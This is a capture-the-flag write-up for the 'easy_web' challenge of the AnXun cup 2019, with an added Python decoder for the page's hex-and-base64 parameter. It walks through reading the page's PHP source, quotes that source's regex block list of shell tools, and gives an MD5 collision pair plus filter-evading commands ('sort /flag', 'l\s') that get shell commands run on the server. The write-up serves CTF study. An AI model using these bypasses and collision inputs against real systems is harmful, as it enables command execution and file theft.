[AnXun cup 2019] easy_web
2022-08-02 22:36:00 【The wind -】
Knowledge points tested:
1. Recognizing encodings on sight (or having strong decoding tools)
2. Knowing the MD5 bypasses for strict comparison
3. Knowing the commands that can read files
Solution:
Open the page and capture the request with Burp:
The request carries img=TXpVek5UTTFNbVUzTURabE5qYz0, so let's put that value straight into a script and run it:
The script is easy to write; write it whichever way you like. The value decodes to 555.png. Judging from the form of the URL value, it has been encoded just three times:
hex->base64->base64
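An added example (not the author's script) of such a decoder: it peels hex and base64 layers automatically instead of hard-coding the chain, and restores the `=` padding that the URL value has lost. The names `peel` and `wrap` are introduced here for illustration, and the heuristic of stopping when a layer no longer decodes to printable ASCII is an assumption of this sketch.

```python
import base64
import re

HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def _printable(raw: bytes) -> bool:
    """True when every byte is printable ASCII, i.e. plausibly another text layer."""
    return bool(raw) and all(0x20 <= b < 0x7F for b in raw)


def _try_layer(text: str):
    """Return (layer_name, decoded_text) for one recognised layer, else None."""
    if HEX_RE.fullmatch(text):  # hex first: hex digits are also valid base64
        raw, name = bytes.fromhex(text), "hex"
    elif B64_RE.fullmatch(text) and len(text.rstrip("=")) % 4 != 1:
        stripped = text.rstrip("=")
        padded = stripped + "=" * (-len(stripped) % 4)  # URLs often drop '='
        try:
            raw, name = base64.b64decode(padded, validate=True), "base64"
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
    else:
        return None
    return (name, raw.decode("ascii")) if _printable(raw) else None


def peel(value: str, max_depth: int = 8):
    """Strip hex/base64 layers until the text no longer decodes to printable ASCII."""
    layers = []
    for _ in range(max_depth):
        step = _try_layer(value)
        if step is None:
            break
        layers.append(step[0])
        value = step[1]
    return layers, value


def wrap(name: str) -> str:
    """Inverse of the page's chain: hex -> base64 -> base64, padding dropped."""
    hexed = name.encode().hex().encode()
    return base64.b64encode(base64.b64encode(hexed)).decode().rstrip("=")


if __name__ == "__main__":
    print(peel("TXpVek5UTTFNbVUzTURabE5qYz0"))  # img value from the page
```

The layers are reported in decoding order, which is the reverse of the hex->base64->base64 encoding order given above.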
Next, let's try to read the page's source code:
Paste the encoded value into img.
Decode the result:
';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "
";
    echo "
";
}
echo $cmd;
echo "
";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "
";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
cmd is heavily filtered, and there is one more condition to satisfy before the command is executed:
(string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])
Simple. Use an MD5 collision pair kept on hand for exactly this:
a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
Approach one:
sort /flag
The drawback of this approach is that I don't know the name of the flag file, so I have to guess.
Approach two:
l\s
This bypass is very useful, and it also reveals the name of the flag file.